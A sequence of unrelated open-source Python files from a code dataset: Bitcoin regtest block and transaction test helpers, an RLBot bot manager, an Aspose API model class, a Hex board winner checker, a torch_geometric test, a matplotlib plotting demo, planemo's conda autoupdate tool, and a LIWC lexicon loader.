hex_str_to_bytes,
ser_string,
ser_uint256,
sha256,
uint256_from_str,
)
from .script import (
CScript,
OP_0,
OP_1,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_RETURN,
OP_TRUE,
hash160,
)
from .util import assert_equal
from io import BytesIO
# From BIP141
WITNESS_COMMITMENT_HEADER = b"\xaa\x21\xa9\xed"
def create_block(hashprev, coinbase, ntime=None):
"""Create a block (with regtest difficulty)."""
block = CBlock()
if ntime is None:
import time
block.nTime = int(time.time() + 600)
else:
block.nTime = ntime
block.hashPrevBlock = hashprev
block.nBits = 0x207fffff # difficulty retargeting is disabled in REGTEST chainparams
block.vtx.append(coinbase)
block.hashMerkleRoot = block.calc_merkle_root()
block.calc_sha256()
return block
def get_witness_script(witness_root, witness_nonce):
witness_commitment = uint256_from_str(hash256(ser_uint256(witness_root) + ser_uint256(witness_nonce)))
output_data = WITNESS_COMMITMENT_HEADER + ser_uint256(witness_commitment)
return CScript([OP_RETURN, output_data])
def add_witness_commitment(block, nonce=0):
"""Add a witness commitment to the block's coinbase transaction.
According to BIP141, blocks with witness rules active must commit to the
hash of all in-block transactions including witness."""
# First calculate the merkle root of the block's
# transactions, with witnesses.
witness_nonce = nonce
witness_root = block.calc_witness_merkle_root()
# witness_nonce should go to coinbase witness.
block.vtx[0].wit.vtxinwit = [CTxInWitness()]
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(witness_nonce)]
# witness commitment is the last OP_RETURN output in coinbase
block.vtx[0].vout.append(CTxOut(0, get_witness_script(witness_root, witness_nonce)))
block.vtx[0].rehash()
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
def serialize_script_num(value):
r = bytearray(0)
if value == 0:
return r
neg = value < 0
absvalue = -value if neg else value
while (absvalue):
r.append(int(absvalue & 0xff))
absvalue >>= 8
if r[-1] & 0x80:
r.append(0x80 if neg else 0)
elif neg:
r[-1] |= 0x80
return r
def create_coinbase(height, pubkey=None):
"""Create a coinbase transaction, assuming no miner fees.
If pubkey is passed in, the coinbase output will be a P2PK output;
otherwise an anyone-can-spend output."""
coinbase = CTransaction()
coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff),
ser_string(serialize_script_num(height)), 0xffffffff))
coinbaseoutput = CTxOut()
coinbaseoutput.nValue = 50 * COIN
halvings = int(height / 150) # regtest
coinbaseoutput.nValue >>= halvings
if (pubkey is not None):
coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG])
else:
coinbaseoutput.scriptPubKey = CScript([OP_TRUE])
coinbase.vout = [coinbaseoutput]
coinbase.calc_sha256()
return coinbase
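# Minimal sketch of how these helpers compose in a functional test; the
# previous-block hash, height and timestamp are placeholders supplied by the
# caller (e.g. taken from getbestblockhash/getblockheader).
def _example_build_next_block(prev_hash, height, prev_time):
    coinbase = create_coinbase(height)
    block = create_block(prev_hash, coinbase, ntime=prev_time + 1)
    add_witness_commitment(block)
    block.solve()  # CBlock.solve() grinds the nonce until the header hash meets the target
    return block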
def create_tx_with_script(prevtx, n, script_sig=b"", *, amount, script_pub_key=CScript()):
"""Return one-input, one-output transaction object
spending the prevtx's n-th output with the given amount.
    Can optionally pass scriptPubKey and scriptSig, default is anyone-can-spend output.
"""
tx = CTransaction()
assert(n < len(prevtx.vout))
tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), script_sig, 0xffffffff))
tx.vout.append(CTxOut(amount, script_pub_key))
tx.calc_sha256()
return tx
def create_transaction(node, txid, to_address, *, amount):
""" Return signed transaction spending the first output of the
input txid. Note that the node must be able to sign for the
output that is being spent, and the node must not be running
multiple wallets.
"""
raw_tx = create_raw_transaction(node, txid, to_address, amount=amount)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(raw_tx)))
return tx
def create_raw_transaction(node, txid, to_address, *, amount):
""" Return raw signed transaction spending the first output of the
input txid. Note that the node must be able to sign for the
output that is being spent, and the node must not be running
multiple wallets.
"""
rawtx = node.createrawtransaction(inputs=[{"txid": txid, "vout": 0}], outputs={to_address: amount})
signresult = node.signrawtransactionwithwallet(rawtx)
assert_equal(signresult["complete"], True)
return signresult['hex']
def get_legacy_sigopcount_block(block, accurate=True):
count = 0
for tx in block.vtx:
count += get_legacy_sigopcount_tx(tx, accurate)
return count
def get_legacy_sigopcount_tx(tx, accurate=True):
count = 0
for i in tx.vout:
count += i.scriptPubKey.GetSigOpCount(accurate)
for j in tx.vin:
# scriptSig might be of type bytes, so convert to CScript for the moment
count += CScript(j.scriptSig).GetSigOpCount(accurate)
return count
def witness_script(use_p2wsh, pubkey):
    """Create a scriptPubKey for a pay-to-witness TxOut.
This is either a P2WPKH output for the given pubkey, or a P2WSH output of a
1-of-1 multisig for the given pubkey. Returns the hex encoding of the
scriptPubKey."""
if not use_p2wsh:
# P2WPKH instead
pubkeyhash = hash160(hex_str_to_bytes(pubkey))
pkscript = CScript([OP_0, pubkeyhash])
else:
# 1-of-1 multisig
witness_program = CScript([OP_1, hex_str_to_bytes(pubkey), OP_1, OP_CHECKMULTISIG])
scripthash = sha256(witness_program)
pkscript = CScript([OP_0, scripthash])
return bytes_to_hex_str(pkscript)
def create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount):
"""Return a transaction (in hex) that spends the given utxo to a segwit output.
Optionally wrap the segwit output using P2SH."""
if use_p2wsh:
program = CScript([OP_1, hex_str_to_bytes(pubkey), OP_1, OP_CHECKMULTISIG])
addr = script_to_p2sh_p2wsh(program) if encode_p2sh else script_to_p2wsh(program)
else:
addr = key_to_p2sh_p2wpkh(pubkey) if encode_p2sh else key_to_p2wpkh(pubkey)
if not encode_p2sh:
assert_equal(node.getaddressinfo(addr)['scriptPubKey'], witness_script(use_p2wsh, pubkey))
return node.createrawtransaction([utxo], {addr: amount})
def send_to_witness(use_p2wsh, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""):
"""Create a transaction spending a given utxo to a segwit output.
The output corresponds to the given pubkey: use_p2wsh determines whether to
use P2WPKH or P2WSH; encode_p2sh determines whether to wrap in P2SH.
sign=True will have the given node sign the transaction.
insert_redeem_script will be added to the scriptSig, if given."""
tx_to_witness = create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount)
if (sign):
signed = node.signrawtransactionwithwallet(tx_to_witness)
        assert "errors" not in signed or len(signed["errors"]) == 0
return node.sendrawtransaction(signed["hex"])
else:
if (insert_redeem_script):
tx = FromHex(CTransaction(), tx_to_witness)
tx.vin[0].scriptSig += CScript([hex_str_to_bytes(insert_redeem_script)])
tx_to_witness = ToHex(tx)
return node.sendrawtransaction(tx_to_witness)
the-stack_106_23768
import multiprocessing as mp
import os
import time
import traceback
from datetime import datetime, timedelta
from rlbot.botmanager.agent_metadata import AgentMetadata
from rlbot.utils import rate_limiter
from rlbot.utils.logging_utils import get_logger
from rlbot.utils.structures.game_interface import GameInterface
from rlbot.utils.structures.quick_chats import register_for_quick_chat, send_quick_chat_flat
GAME_TICK_PACKET_REFRESHES_PER_SECOND = 120 # 2*60. https://en.wikipedia.org/wiki/Nyquist_rate
MAX_CHAT_RATE = 2.0
MAX_CHAT_COUNT = 5
MAX_AGENT_CALL_PERIOD = timedelta(seconds=1.0 / 30) # Minimum call rate when paused.
REFRESH_IN_PROGRESS = 1
REFRESH_NOT_IN_PROGRESS = 0
MAX_CARS = 10
class BotManager:
def __init__(self, terminate_request_event, termination_complete_event, reload_request_event, bot_configuration,
name, team, index, agent_class_wrapper, agent_metadata_queue, quick_chat_queue_holder):
"""
:param terminate_request_event: an Event (multiprocessing) which will be set from the outside when the program is trying to terminate
:param termination_complete_event: an Event (multiprocessing) which should be set from inside this class when termination has completed successfully
:param reload_request_event: an Event (multiprocessing) which will be set from the outside to force a reload of the agent
:param reload_complete_event: an Event (multiprocessing) which should be set from inside this class when reloading has completed successfully
:param bot_configuration: parameters which will be passed to the bot's constructor
:param name: name which will be passed to the bot's constructor. Will probably be displayed in-game.
:param team: 0 for blue team or 1 for orange team. Will be passed to the bot's constructor.
:param index: The player index, i.e. "this is player number <index>". Will be passed to the bot's constructor.
Can be used to pull the correct data corresponding to the bot's car out of the game tick packet.
:param agent_class_wrapper: The ExternalClassWrapper object that can be used to load and reload the bot
:param agent_metadata_queue: a Queue (multiprocessing) which expects to receive certain metadata about the agent once available.
:param quick_chat_queue_holder: A data structure which helps the bot send and receive quickchat
"""
self.terminate_request_event = terminate_request_event
self.termination_complete_event = termination_complete_event
self.reload_request_event = reload_request_event
self.bot_configuration = bot_configuration
self.name = name
self.team = team
self.index = index
self.agent_class_wrapper = agent_class_wrapper
self.agent_metadata_queue = agent_metadata_queue
self.logger = get_logger('bot' + str(self.index))
self.game_interface = GameInterface(self.logger)
self.quick_chat_queue_holder = quick_chat_queue_holder
self.last_chat_time = time.time()
self.chat_counter = 0
self.reset_chat_time = True
self.game_tick_packet = None
self.bot_input = None
def send_quick_chat_from_agent(self, team_only, quick_chat):
"""
        Passes the agent's quick chats to the other bots.
This does perform limiting.
You are limited to 5 quick chats in a 2 second period starting from the first chat.
This means you can spread your chats out to be even within that 2 second period.
You could spam them in the first little bit but then will be throttled.
"""
time_since_last_chat = time.time() - self.last_chat_time
if not self.reset_chat_time and time_since_last_chat >= MAX_CHAT_RATE:
self.reset_chat_time = True
if self.reset_chat_time:
self.last_chat_time = time.time()
self.chat_counter = 0
self.reset_chat_time = False
if self.chat_counter < MAX_CHAT_COUNT:
send_quick_chat_flat(self.game_interface, self.index, self.team, team_only, quick_chat)
#send_quick_chat(self.quick_chat_queue_holder, self.index, self.team, team_only, quick_chat)
self.chat_counter += 1
else:
self.logger.debug('quick chat disabled for %s', MAX_CHAT_RATE - time_since_last_chat)
def load_agent(self):
"""
Loads and initializes an agent using instance variables, registers for quick chat and sets render functions.
:return: An instance of an agent, and the agent class file.
"""
agent_class = self.agent_class_wrapper.get_loaded_class()
agent = agent_class(self.name, self.team, self.index)
agent.logger = self.logger
agent.load_config(self.bot_configuration.get_header("Bot Parameters"))
self.update_metadata_queue(agent)
self.set_render_manager(agent)
agent_class_file = self.agent_class_wrapper.python_file
agent._register_quick_chat(self.send_quick_chat_from_agent)
agent._register_field_info(self.get_field_info)
agent._register_set_game_state(self.set_game_state)
agent._register_ball_prediction(self.get_ball_prediction)
register_for_quick_chat(self.quick_chat_queue_holder, agent.handle_quick_chat, self.terminate_request_event)
# Once all engine setup is done, do the agent-specific initialization, if any:
agent.initialize_agent()
return agent, agent_class_file
def set_render_manager(self, agent):
"""
Sets the render manager for the agent.
:param agent: An instance of an agent.
"""
rendering_manager = self.game_interface.renderer.get_rendering_manager(self.index, self.team)
agent._set_renderer(rendering_manager)
def update_metadata_queue(self, agent):
"""
Adds a new instance of AgentMetadata into the `agent_metadata_queue` using `agent` data.
:param agent: An instance of an agent.
"""
pids = {os.getpid(), *agent.get_extra_pids()}
helper_process_request = agent.get_helper_process_request()
self.agent_metadata_queue.put(AgentMetadata(self.index, self.name, self.team, pids, helper_process_request))
def reload_agent(self, agent, agent_class_file):
"""
Reloads the agent. Can throw exceptions. External classes should use reload_event.set() instead.
:param agent: An instance of an agent.
:param agent_class_file: The agent's class file.
:return: The reloaded instance of the agent, and the agent class file.
"""
self.logger.info('Reloading Agent: ' + agent_class_file)
self.agent_class_wrapper.reload()
old_agent = agent
agent, agent_class_file = self.load_agent()
# Retire after the replacement initialized properly.
if hasattr(old_agent, 'retire'):
old_agent.retire()
return agent, agent_class_file
def run(self):
"""
Loads interface for RLBot, prepares environment and agent, and calls the update for the agent.
"""
self.logger.debug('initializing agent')
self.game_interface.load_interface()
self.prepare_for_run()
# Create Ratelimiter
rate_limit = rate_limiter.RateLimiter(GAME_TICK_PACKET_REFRESHES_PER_SECOND)
last_tick_game_time = None # What the tick time of the last observed tick was
last_call_real_time = datetime.now() # When we last called the Agent
# Get bot module
agent, agent_class_file = self.load_agent()
last_module_modification_time = os.stat(agent_class_file).st_mtime
# Run until main process tells to stop
while not self.terminate_request_event.is_set():
before = datetime.now()
self.pull_data_from_game()
# game_tick_packet = self.game_interface.get
# Read from game data shared memory
# Run the Agent only if the game_info has updated.
tick_game_time = self.get_game_time()
should_call_while_paused = datetime.now() - last_call_real_time >= MAX_AGENT_CALL_PERIOD
if tick_game_time != last_tick_game_time or should_call_while_paused:
last_tick_game_time = tick_game_time
last_call_real_time = datetime.now()
# Reload the Agent if it has been modified or if reload is requested from outside.
try:
new_module_modification_time = os.stat(agent_class_file).st_mtime
if new_module_modification_time != last_module_modification_time or self.reload_request_event.is_set():
self.reload_request_event.clear()
last_module_modification_time = new_module_modification_time
agent, agent_class_file = self.reload_agent(agent, agent_class_file)
except FileNotFoundError:
self.logger.error("Agent file {} was not found. Will try again.".format(agent_class_file))
time.sleep(0.5)
except Exception:
self.logger.error("Reloading the agent failed:\n" + traceback.format_exc())
time.sleep(0.5) # Avoid burning CPU / logs if this starts happening constantly
# Call agent
try:
self.call_agent(agent, self.agent_class_wrapper.get_loaded_class())
except Exception as e:
self.logger.error("Call to agent failed:\n" + traceback.format_exc())
# Ratelimit here
after = datetime.now()
rate_limit.acquire(after - before)
if hasattr(agent, 'retire'):
agent.retire()
# If terminated, send callback
self.termination_complete_event.set()
def get_field_info(self):
return self.game_interface.get_field_info()
def set_game_state(self, game_state):
return self.game_interface.set_game_state(game_state)
def get_ball_prediction(self):
return self.game_interface.get_ball_prediction()
def prepare_for_run(self):
raise NotImplementedError
def call_agent(self, agent, agent_class):
raise NotImplementedError
def get_game_time(self):
raise NotImplementedError
def pull_data_from_game(self):
raise NotImplementedError
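# Sketch of the hooks a concrete subclass is expected to provide (the bodies
# below are illustrative placeholders, not the real RLBot implementations).
class _ExampleBotManager(BotManager):
    def prepare_for_run(self):
        self.game_tick_packet = None  # allocate whatever packet structure is needed
    def pull_data_from_game(self):
        pass  # read the latest game tick packet from self.game_interface
    def get_game_time(self):
        return 0.0  # timestamp of the packet read in pull_data_from_game
    def call_agent(self, agent, agent_class):
        pass  # hand the packet to the agent and forward its controller output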
the-stack_106_23769
# coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="Link.py">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
import pprint
import re # noqa: F401
import six
class Link(object):
"""
    Provides information for the object link. This is supposed to be an atom:link, therefore it should have all attributes specified here http://tools.ietf.org/html/rfc4287#section-4.2.7
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'href': 'str',
'rel': 'str',
'type': 'str',
'title': 'str'
}
attribute_map = {
'href': 'Href',
'rel': 'Rel',
'type': 'Type',
'title': 'Title'
}
def __init__(self, href=None, rel=None, type=None, title=None, **kwargs): # noqa: E501
"""Initializes new instance of Link""" # noqa: E501
self._href = None
self._rel = None
self._type = None
self._title = None
if href is not None:
self.href = href
if rel is not None:
self.rel = rel
if type is not None:
self.type = type
if title is not None:
self.title = title
@property
def href(self):
"""
Gets the href. # noqa: E501
The \"href\" attribute contains the link's IRI. atom:link elements MUST have an href attribute, whose value MUST be a IRI reference # noqa: E501
:return: The href. # noqa: E501
:rtype: str
"""
return self._href
@href.setter
def href(self, href):
"""
Sets the href.
The \"href\" attribute contains the link's IRI. atom:link elements MUST have an href attribute, whose value MUST be a IRI reference # noqa: E501
:param href: The href. # noqa: E501
:type: str
"""
self._href = href
@property
def rel(self):
"""
Gets the rel. # noqa: E501
atom:link elements MAY have a \"rel\" attribute that indicates the link relation type. If the \"rel\" attribute is not present, the link element MUST be interpreted as if the link relation type is \"alternate\" # noqa: E501
:return: The rel. # noqa: E501
:rtype: str
"""
return self._rel
@rel.setter
def rel(self, rel):
"""
Sets the rel.
atom:link elements MAY have a \"rel\" attribute that indicates the link relation type. If the \"rel\" attribute is not present, the link element MUST be interpreted as if the link relation type is \"alternate\" # noqa: E501
:param rel: The rel. # noqa: E501
:type: str
"""
self._rel = rel
@property
def type(self):
"""
Gets the type. # noqa: E501
On the link element, the \"type\" attribute's value is an advisory media type: it is a hint about the type of the representation that is expected to be returned when the value of the href attribute is dereferenced. Note that the type attribute does not override the actual media type returned with the representation # noqa: E501
:return: The type. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type.
On the link element, the \"type\" attribute's value is an advisory media type: it is a hint about the type of the representation that is expected to be returned when the value of the href attribute is dereferenced. Note that the type attribute does not override the actual media type returned with the representation # noqa: E501
:param type: The type. # noqa: E501
:type: str
"""
self._type = type
@property
def title(self):
"""
Gets the title. # noqa: E501
The \"title\" attribute conveys human-readable information about the link. The content of the \"title\" attribute is Language-Sensitive # noqa: E501
:return: The title. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""
Sets the title.
The \"title\" attribute conveys human-readable information about the link. The content of the \"title\" attribute is Language-Sensitive # noqa: E501
:param title: The title. # noqa: E501
:type: str
"""
self._title = title
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Link):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
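# Brief usage sketch (the field values below are illustrative only):
#
#   link = Link(href="https://api.example.com/v1/files/readme.txt",
#               rel="self", type="application/json", title="readme.txt")
#   print(link.to_dict())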
the-stack_106_23770
class ConnectGame:
def __init__(self, board):
self.board = [row.replace(" ", "") for row in board.splitlines()]
def get_winner(self):
if self.is_winner("O"):
return "O"
elif self.is_winner("X"):
return "X"
else:
return ""
def is_winner(self, player):
board = self.board if player == "O" else [
[self.board[r][c] for r in range(len(self.board))]
for c in range(len(self.board[0]))]
positions = [(0, c) for c, s in enumerate(board[0]) if s == player]
checked = set(positions)
while positions != []:
r, c = positions.pop()
if r == len(board) - 1:
return True
for i, j in [(-1, 1), (-1, 0), (0, -1), (0, 1), (1, -1), (1, 0)]:
r_ = r + i
c_ = c + j
if 0 <= r_ < len(board) and 0 <= c_ < len(board[0]) \
and board[r_][c_] == player and (r_, c_) not in checked:
positions.append((r_, c_))
checked.add((r_, c_))
return False
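# Quick usage sketch: "O" tries to connect the top row to the bottom row, "X"
# tries to connect the left edge to the right edge on the same hex board (the
# spaces in each row are stripped by the constructor).
if __name__ == "__main__":
    example_board = "\n".join([
        ". O . .",
        " O X X X",
        "  O . . .",
        "   O . . .",
    ])
    print(ConnectGame(example_board).get_winner())  # -> "O"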
the-stack_106_23772
import torch
from torch.nn import Sequential as Seq, Linear as Lin, ReLU
from torch_geometric.nn import PPFConv
def test_point_conv():
in_channels, out_channels = (16, 32)
edge_index = torch.tensor([[0, 0, 0, 1, 2, 3], [1, 2, 3, 0, 0, 0]])
num_nodes = edge_index.max().item() + 1
x = torch.randn((num_nodes, in_channels))
pos = torch.rand((num_nodes, 3))
norm = torch.nn.functional.normalize(torch.rand((num_nodes, 3)), dim=1)
local_nn = Seq(Lin(in_channels + 4, 32), ReLU(), Lin(32, out_channels))
global_nn = Seq(Lin(out_channels, out_channels))
conv = PPFConv(local_nn, global_nn)
assert conv.__repr__() == (
'PPFConv(local_nn=Sequential(\n'
' (0): Linear(in_features=20, out_features=32, bias=True)\n'
' (1): ReLU()\n'
' (2): Linear(in_features=32, out_features=32, bias=True)\n'
'), global_nn=Sequential(\n'
' (0): Linear(in_features=32, out_features=32, bias=True)\n'
'))')
out = conv(x, pos, norm, edge_index)
assert out.size() == (num_nodes, out_channels)
jit_conv = conv.jittable(x=x, pos=pos, norm=norm, edge_index=edge_index)
jit_conv = torch.jit.script(jit_conv)
assert jit_conv(x, pos, norm, edge_index).tolist() == out.tolist()
the-stack_106_23774
import numpy as np
import matplotlib.pyplot as plt
# Compute the x and y coordinates for points on sine and cosine curves
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
# Set up a subplot grid that has height 3 and width 1,
# and set the first such subplot as active.
plt.subplot(3,1,1)
# Make the first plot
plt.plot(x, y_sin)
plt.title('Sine')
# Set the second subplot as active, and make the second plot.
plt.subplot(312)
plt.plot(x, y_cos)
plt.title('Cosine')
plt.subplot(313)
plt.plot(x, y_cos)
plt.title('Cosine2')
# Show the figure.
plt.show()
the-stack_106_23775
"""Autoupdate older conda dependencies in the requirements section."""
from __future__ import absolute_import
import collections
import re
import xml.etree.ElementTree as ET
from galaxy.tool_util.deps import conda_util
import planemo.conda
from planemo.io import error, info
def find_macros(xml_tree):
"""
Get macros from the XML tree
"""
macros = []
for macro_import in xml_tree.iter("import"):
macros.append(macro_import.text)
return macros
def get_requirements(xml_tree):
"""
Get requirements from the XML tree
"""
requirements = {}
main_req = None
for requirement in xml_tree.iter("requirement"):
if requirement.attrib.get('version') == '@TOOL_VERSION@':
main_req = requirement.text
else:
requirements[requirement.text] = {'tag': ET.tostring(requirement, encoding="unicode").strip(), 'text': requirement.attrib.get('version')}
return requirements, main_req
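# Quick illustration of get_requirements on a minimal tool XML (the tool name
# and versions are made up):
#
#   xml_tree = ET.fromstring(
#       '<tool><requirements>'
#       '<requirement type="package" version="@TOOL_VERSION@">samtools</requirement>'
#       '<requirement type="package" version="1.11">htslib</requirement>'
#       '</requirements></tool>'
#   )
#   reqs, main_req = get_requirements(xml_tree)
#   # main_req == "samtools"; reqs == {"htslib": {"tag": "...", "text": "1.11"}}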
def get_tokens(xml_tree):
"""
Get tokens from the XML tree
"""
tokens = {}
for token in xml_tree.iter("token"):
tokens[token.attrib['name']] = {'tag': ET.tostring(token, encoding="unicode").strip(), 'text': token.text}
return tokens
def check_conda(tool_name, ctx, **kwds):
"""
Get the most up-to-date conda version for a tool requirement
"""
conda_context = planemo.conda.build_conda_context(ctx, **kwds)
if not conda_context.is_conda_installed():
error("Conda is not installed! Try running planemo conda_init.")
target = planemo.conda.conda_util.CondaTarget(tool_name)
search_results = conda_util.best_search_result(target, conda_context=conda_context)
return search_results[0]['version']
def update_xml(tool_path, xml_tree, tags_to_update, wrapper_version_token, is_macro=False):
"""
Write modified XML to tool_path
"""
def update_token(xml_text, tag, token_value):
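        # Swap whatever sits between '>' and '<' in the tag for the new token
        # value, then substitute the rewritten tag back into the XML text.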
new_tag = '>{}<'.format(token_value).join(re.split('>.*<', tag))
return re.sub(tag, new_tag, xml_text)
def update_requirement(xml_text, tag, requirement_value):
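        # Same idea as update_token, but rewriting the version="..." attribute
        # of a requirement tag instead of the element text.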
new_tag = 'version="{}"'.format(requirement_value).join(re.split('version=".*"', tag))
return re.sub(tag, new_tag, xml_text)
with open(tool_path, 'r+', newline='') as f:
xml_text = f.read()
for tag_to_update in tags_to_update:
if tag_to_update['type'] == 'token':
xml_text = update_token(xml_text, tag_to_update['tag'], tag_to_update['value'])
if tag_to_update['type'] == 'requirement':
xml_text = update_requirement(xml_text, tag_to_update['tag'], tag_to_update['value'])
if wrapper_version_token == 0 and not is_macro:
# i.e. @VERSION_SUFFIX@ not specified so update the version directly in the tool tag
tool_tag = re.sub('version="@TOOL_VERSION@.*?"', 'version="@TOOL_VERSION@+galaxy0"',
re.findall('<tool .*version="@TOOL_VERSION@.*">', xml_text)[0])
xml_text = re.sub('<tool .*version="@TOOL_VERSION@.*">', tool_tag, xml_text)
f.seek(0)
f.truncate()
f.write(xml_text)
def create_requirement_dict(xml_files, skip_reqs):
"""
Create dict with requirements and find main requirement
"""
requirements = {}
main_req = None
for k, v in xml_files.items():
file_reqs, file_main_req = get_requirements(v)
requirements[k] = {k: v for k, v in file_reqs.items() if k not in skip_reqs}
if file_main_req:
if main_req:
error('Multiple requirements use the token @TOOL_VERSION@!')
main_req = (file_main_req, k)
if not main_req:
error('No requirement uses the token @TOOL_VERSION@!')
return requirements, main_req
def create_token_dict(ctx, xml_files, main_req, **kwds):
"""
Create dict with relevant tokens and check conda requirements for main
"""
tokens = {}
current_main_req, updated_main_req = None, None
xml_to_update = collections.defaultdict(list)
for k, v in xml_files.items():
tokens[k] = get_tokens(v)
# check if it is @TOOL_VERSION@ and if so do check_conda
if '@TOOL_VERSION@' in tokens[k]:
current_main_req = tokens[k]['@TOOL_VERSION@']['text']
updated_main_req = check_conda(main_req[0], ctx, **kwds)
if current_main_req:
xml_to_update[k].append({'type': 'token', 'tag': tokens[k]['@TOOL_VERSION@']['tag'], 'value': updated_main_req})
return tokens, xml_to_update, current_main_req, updated_main_req
def perform_required_update(ctx, xml_files, tool_path, requirements, tokens, xml_to_update, wrapper_version_token, **kwds):
"""
Carry out the update, if requirements are out-of-date
"""
# check all requirements
for k, v in requirements.items():
for req in v:
req_check = check_conda(req, ctx, **kwds)
# print(req_check, v[req]['text'])
if req_check != v[req]['text']:
xml_to_update[k].append({'type': 'requirement', 'tag': v[req]['tag'], 'value': req_check})
# check all tokens, if wrapper_version_token exists
if wrapper_version_token:
for k, v in tokens.items():
if wrapper_version_token in v:
xml_to_update[k].append({'type': 'token', 'tag': v[wrapper_version_token]['tag'], 'value': 0})
# finally, update each file separately
for k, v in xml_files.items():
update_xml(k, v, xml_to_update[k], wrapper_version_token, is_macro=(k != tool_path))
info("Tool {} updated.".format(tool_path))
return set(xml_files)
def autoupdate_tool(ctx, tool_path, modified_files=set(), **kwds):
"""
Autoupdate an XML file
"""
# create a dict of all files that need editing - wrapper plus macros
xml_files = {tool_path: ET.parse(tool_path)}
# get name of token which defines the wrapper version; if just an integer, None
versions = xml_files[tool_path].getroot().attrib.get('version')
if versions:
versions = versions.split('+galaxy')
if versions[0] != '@TOOL_VERSION@':
error('Tool version does not contain @TOOL_VERSION@ as required by autoupdate.')
return
elif len(versions) == 1:
wrapper_version_token = None
else:
if versions[1][0] == versions[1][-1] == '@':
wrapper_version_token = versions[1]
else:
wrapper_version_token = 0 # assume an int
else:
wrapper_version_token = None
# add macros to xml_files
for macro in find_macros(xml_files[tool_path]):
macro_path = '/'.join(tool_path.split('/')[:-1] + [macro])
xml_files[macro_path] = ET.parse(macro_path)
requirements, main_req = create_requirement_dict(xml_files, kwds.get('skip_requirements', '').split(','))
tokens, xml_to_update, current_main_req, updated_main_req = create_token_dict(ctx, xml_files, main_req, **kwds)
if current_main_req == updated_main_req and not (modified_files & set(xml_files)):
info("No updates required or made to {}.".format(tool_path))
return # end here if no update needed
if kwds.get('dry_run'):
error("Update required to {}! Tool main requirement has version {}, newest conda version is {}".format(
tool_path, current_main_req, updated_main_req))
return
else:
return perform_required_update(ctx, xml_files, tool_path, requirements, tokens, xml_to_update, wrapper_version_token, **kwds)
def _update_wf(config, workflow_id):
"""
Recursively update a workflow, including subworkflows
"""
wf = config.user_gi.workflows.show_workflow(workflow_id)
for step in wf['steps'].values():
if step['type'] == 'subworkflow':
# update subworkflows before the main workflow
_update_wf(config, step['workflow_id'])
config.user_gi.workflows.refactor_workflow(workflow_id, actions=[{"action_type": "upgrade_all_steps"}])
def autoupdate_wf(ctx, config, wf):
workflow_id = config.workflow_id_for_runnable(wf)
_update_wf(config, workflow_id)
return config.user_gi.workflows.export_workflow_dict(workflow_id)
|
the-stack_106_23776 | import os
#from sys_config import BASE_DIR
import matplotlib.pyplot as plt
import seaborn as sns
BASE_DIR = '../data/'
# LIWC Lexicon http://lit.eecs.umich.edu/~geoliwc/LIWC_Dictionary.htm
def load_liwc_lexicon(file):
# returns LIWC in the form of a dictionary
# keys: words, values: feature vector (list)
_data = {}
lines = open(file, "r", encoding="utf-8").readlines()
for line_id, line in enumerate(lines):
_row = line.rstrip().split(" ")
_word = _row[0]
_features = _row[1:]
_data[_word] = _features
return _data
def load_features(file):
dim2num = {} # [dimension name]: corresponding number in lexicon list
num2dim = {} # the exact opposite
lines = open(file, "r", encoding="utf-8").readlines()
for line_id, line in enumerate(lines):
_row = line.rstrip().split(" ")
_dim = _row[1]
dim2num[_dim] = line_id
num2dim[line_id] = _dim
return dim2num, num2dim
####################################################
# Load LIWC Lexicon
####################################################
def liwc_lex():
# get the liwc lexicon in the form of a dictionary
# where keys are the unique words
    # and the values are lists with all the dimensions (73 in total)
lex = load_liwc_lexicon(
os.path.join(BASE_DIR, 'PsycholinguisticLexicon.txt'))
total_words = len(lex)
